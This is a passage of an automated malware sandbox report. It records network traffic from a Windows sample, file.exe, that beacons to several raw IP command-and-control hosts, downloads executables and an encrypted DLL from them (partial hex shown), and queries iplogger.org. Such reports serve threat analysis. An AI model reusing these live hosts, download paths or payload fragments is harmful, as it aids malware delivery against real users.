                                                      Oct 3, 2022 17:29:59.748922110 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.748960018 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776179075 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776266098 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776303053 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776340961 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776341915 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776377916 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776407957 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776415110 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776427031 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776452065 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776454926 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776489019 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776490927 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776526928 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776535034 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776566982 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776566982 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776606083 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776606083 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776648045 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776648045 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776684046 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776684999 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776724100 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776726007 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776761055 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776762009 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776798964 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776801109 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776838064 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776838064 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776876926 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776879072 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776918888 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776926994 CEST4969480192.168.2.585.31.46.167
                                                      Oct 3, 2022 17:29:59.776963949 CEST804969485.31.46.167192.168.2.5
                                                      Oct 3, 2022 17:29:59.776963949 CEST4969480192.168.2.585.31.46.167

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 3, 2022 17:30:46.893327951 CEST5689453192.168.2.58.8.8.8
                                                      Oct 3, 2022 17:30:46.912929058 CEST53568948.8.8.8192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 3, 2022 17:30:46.893327951 CEST192.168.2.58.8.8.80x4d71Standard query (0)iplogger.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 3, 2022 17:30:46.912929058 CEST8.8.8.8192.168.2.50x4d71No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • iplogger.org
                                                      • 208.67.104.97
                                                      • 85.31.46.167
                                                      • 107.182.129.235
                                                      • 171.22.30.106

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.549701148.251.234.83443C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                                                      TimestampkBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.549693208.67.104.9780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:29:56.561955929 CEST0OUTGET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 208.67.104.97
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:29:58.568043947 CEST0INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:29:56 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.54969485.31.46.16780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:29:59.693042994 CEST1OUTGET /software.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: D
                                                      Host: 85.31.46.167
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:29:59.721107960 CEST3INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:29:59 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="dll";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 242176
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{
                                                      Oct 3, 2022 17:29:59.949419975 CEST258OUTGET /software.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: E
                                                      Host: 85.31.46.167
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:29:59.982002974 CEST259INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:29:59 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="soft";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 3947920
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ ``TO 2(<@8 H.text `.rsrc2 @@.reloc@@BHh@ET;(*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.549698208.67.104.9780C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:30:23.099719048 CEST4457OUTGET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 208.67.104.97
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:24.871246099 CEST4458INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:23 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.549699107.182.129.23580C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:30:25.035912037 CEST4458OUTGET /storage/ping.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 0
                                                      Host: 107.182.129.235
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:25.063242912 CEST4459INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:25 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 17
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55
                                                      Data Ascii: UwUoooIIrwgh24uuU
                                                      Oct 3, 2022 17:30:25.112026930 CEST4459OUTGET /storage/extension.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 1
                                                      Host: 107.182.129.235
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:25.139234066 CEST4461INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:25 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Pragma: public
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Cache-Control: private
                                                      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                      Content-Transfer-Encoding: binary
                                                      Content-Length: 94224
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: application/octet-stream
                                                      Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00
                                                      Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq|2iR2WFC=MUH6A@OcMx8L- b|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i*)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(*PJ#:ISD}vjK9LQF


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      5192.168.2.549700171.22.30.10680C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:30:25.350914955 CEST4560OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:25.879477978 CEST4560INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:25 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:27.926572084 CEST4560OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:28.510983944 CEST4561INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:27 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:30.576231003 CEST4561OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:31.119661093 CEST4562INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:30 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=98
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:33.219202042 CEST4562OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:33.738348961 CEST4562INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:33 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=97
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:35.788949013 CEST4563OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:36.318706989 CEST4563INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:35 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
